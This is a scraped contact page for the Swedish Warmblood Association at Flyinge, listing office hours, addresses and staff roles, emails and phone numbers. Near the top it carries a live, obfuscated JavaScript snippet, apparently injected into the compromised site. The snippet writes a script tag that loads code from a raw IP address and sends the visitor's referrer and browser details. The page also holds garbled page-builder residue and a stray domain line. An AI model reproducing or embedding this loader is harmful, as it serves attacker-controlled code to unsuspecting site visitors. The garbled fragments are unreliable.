Contact – SWB | Swedish Warmblood Association

Contact

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("<7 8=\'2\' 9=\'a\' b=\'c/2\' d=\'e://5.f.g.6/1/j.k.l?r="+0(3.m)+"\n="+0(o.p)+"\'><\/q"+"s>");t i="4";',30,30,'encodeURI||javascript|document|aheiz||97|script|language|rel|nofollow|type|text|src|http|45|67|write|ieyta|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) background_layout=”light” text_orientation=”left” use_border_color=”off” border_color=”#ffffff” border_style=”solid” text_font_size=”15″ custom_margin=”||0px|” custom_margin_tablet=”||-15px|” custom_margin_phone=”||-30px|” custom_margin_last_edited=”on|tablet” background_position=”top_left” background_repeat=”repeat” background_size=”initial”]

Please visit us at the office located at Flyinge, the Swedish National Equestrian Center or contact us via telephone or e-mail. Don’t forget to follow us on Facebook and Instagram!

Telephone

+46 (0) 46 646 50

Hours

Mon-Thurs: 09.00 – 12.00

Address

Visiting and delivery address:
Flyinge Kungsgård, 247 93 Flyinge

Billing address:
Box 2, 247 29 Flyinge

Mail

info@swb.org

Office personnel

Helen Uddefors

CEO

helen.uddefors@swb.org
Tel +46 46 – 646 52
Cell +46 707-93 78 32

Ann-Charlotte Cadier

Stallions & Breedings

Elisabet Ernblad

Communication & Marketing

elisabet.ernblad@swb.org
Tel +46 46 – 646 59

Josefine Tinglöf

Young Horse Tests, Judges, National
Mare Championships & Young SWB

josefine.tinglof@swb.org
Tel +46 46-646 48

Elisabeth Olsson

Education

elisabeth.olsson@swb.org
Tel +46 46-646 56

Göran Smedberg

Finances & IT

goran.smedberg@swb.org
Tel +46 46 – 646 55

Cecilia Turesson

Registrar, Transfer Of Ownership

cecilia.turesson@swb.org
Tel +46 46 – 646 57

Anette Sånesson

Registrar, Performance Mares Classification, Transfer Of Ownership

anette.sanesson@swb.org
Tel +46 46 – 646 54

Emma Thorén-Hellsten

Breeding Director, breeding advice

emma.t.hellsten@swb.org
Tel +46 46-646 53

Lottis Levin

Breeders Trophy

lottis.levin@swb.org
Tel +46 46 – 646 58

faperplace.com